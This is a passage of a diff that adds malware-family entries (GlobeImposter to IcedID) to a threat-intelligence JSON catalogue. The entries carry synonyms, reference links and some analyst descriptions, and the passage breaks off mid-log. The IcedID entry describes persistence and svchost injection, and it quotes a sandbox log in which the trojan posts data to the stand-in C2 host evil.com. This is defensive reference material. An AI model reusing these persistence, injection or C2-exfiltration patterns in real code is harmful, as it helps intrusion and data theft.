"https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", + "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://isc.sans.edu/diary/23417" + ] + }, + "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", + "value": "GlobeImposter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" + ] + }, + "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", + "value": "Globe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", + "value": "GlooxMail", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", + "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", + "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", + "http://resources.infosecinstitute.com/tdss4-part-1/" + ] + }, + "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", + "value": "win.glupteba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" + ] + }, + "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", + "value": "Godzilla Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", + "value": "Goggles", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Petya/Mischa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", + "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" + ] + }, + "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", + "value": "GoldenEye", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", + "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + ] + }, + "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", + "value": "GoldDragon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", + "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" + ] + }, + "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", + "value": "Golroted", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Fuerboos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" + ] + }, + "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", + "value": "Goodor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", + "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" + ] + }, + "uuid": "d1298818-6425-49be-9764-9f119d964efd", + "value": "GoogleDrive RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", + "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" + ] + }, + "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", + "value": "GooPic Drooper", + "description": "" + }, + { + "meta": { + "synonyms": [ + "talalpek", + "Xswkit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", + "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", + "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", + "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", + "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://www.youtube.com/watch?v=242Tn0IL2jE", + "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", + "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", + "https://news.drweb.com/show/?i=4338&lng=en", + "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", + "https://www.youtube.com/watch?v=QgUlPvEE4aw", + 
"https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" + ] + }, + "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", + "value": "GootKit", + "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", + "https://www.yumpu.com/en/document/view/55930175/govrat-v20" + ] + }, + "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", + "value": "GovRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CRM", + "Gozi CRM", + "Papras", + "Snifula", + "Ursnif" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", + "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", + "https://www.secureworks.com/research/gozi", + "https://lokalhost.pl/gozi_tree.txt", + "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html" + ] + }, + "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", + "value": "Gozi", + "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. 
Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", + "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", + "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", + "https://de.securelist.com/analysis/59479/erpresser/", + "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", + "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" + ] + }, + "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", + "value": "GPCode", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", + "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" + ] + }, + "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", + "value": "GrabBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", + "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" + ] + }, + "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", + "value": "Graftor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FrameworkPOS", + "trinity" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", + 
"https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" + ] + }, + "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", + "value": "Grateful POS", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", + "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + ] + }, + "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", + "value": "Gratem", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", + "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", + "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + ] + }, + "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", + "value": "Gravity RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "eoehttp" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", + "https://blog.cylance.com/spear-a-threat-actor-resurfaces" + ] + }, + "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", + "value": "GreenShaitan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", + "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + ] + }, + "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", + "value": "GROK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", + "https://attack.mitre.org/wiki/Technique/T1003" + ] + }, + "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", + "value": "gsecdump", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", + "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" + ] + }, + "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", + "value": "H1N1 Loader", + "description": "" + }, + { + 
"meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", + "value": "Hacksfase", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", + "https://github.com/ratty3697/HackSpy-Trojan-Exploit" + ] + }, + "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", + "value": "HackSpy", + "description": "Py2Exe based tool as found on github." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", + "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" + ] + }, + "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", + "value": "Hamweq", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Chanitor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", + "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", + "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + 
"https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak" + ] + }, + "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", + "value": "Hancitor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" + ] + }, + "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", + "value": "HappyLocker (HiddenTear?)", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Piptea" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", + "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", + "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" + ] + }, + "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", + "value": "Harnig", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", + "https://www.f-secure.com/weblog/archives/00002718.html" + ] + }, + "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", + "value": "Havex RAT", + "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. 
Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries." 
+ }, + { + "meta": { + "synonyms": [ + "Predator Pain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", + "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", + "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", + "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", + "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/" + ] + }, + "uuid": "31615066-dbff-4134-b467-d97a337b408b", + "value": "HawkEye Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", + "value": "Helauto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" + ] + }, + "uuid": "19d89300-ff97-4281-ac42-76542e744092", + "value": "Helminth", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", + "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", + "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" + ] + }, + "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", + "value": "Heloag", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", + "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" + ] + }, + "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", + "value": "Herbst", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", + "value": "Heriplor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", + "value": "Hermes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", + "value": "Hermes Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" + ] + }, + "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", + "value": "HerpesBot", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" + ] + }, + "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", + "value": "HesperBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", + "https://github.com/goliate/hidden-tear", + "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", + "https://twitter.com/struppigel/status/950787783353884672" + ] + }, + "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", + "value": "HiddenTear", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" + ] + }, + "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", + "value": "HideDRV", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", + "https://www.recordedfuture.com/hidden-lynx-analysis/", + "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" + ] + }, + "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", + "value": "HiKit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", + "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" + ] + }, + "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", + "value": "himan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", + "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" + ] + }, + "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", + "value": "Hi-Zor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" + ] + }, + "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", + "value": "HLUX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", + "value": "homefry", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" + ] + }, + "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", + "value": "HtBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", + "https://www.riskiq.com/blog/labs/htprat/" + ] + }, + "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", + "value": "htpRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HUC Packet Transmit Tool" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", + "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", + "https://www.secureworks.com/research/htran" + ] + }, + "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", + "value": "HTran", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", + "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" + 
] + }, + "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", + "value": "HttpBrowser", + "description": "" + }, + { + "meta": { + "synonyms": [ + "httpdr0pper" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", + "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" + ] + }, + "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", + "value": "httpdropper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + ] + }, + "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", + "value": "http_troy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "houdini" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "94466a80-964f-467e-b4b3-0e1375174464", + "value": "Hworm", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", + "https://securelist.com/luckymouse-hits-national-data-center/86083/" + ] + }, + "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", + "value": "HyperBro", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BokBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", + 
"https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", + "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + ] + }, + "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", + "value": "IcedID", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. 
waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] 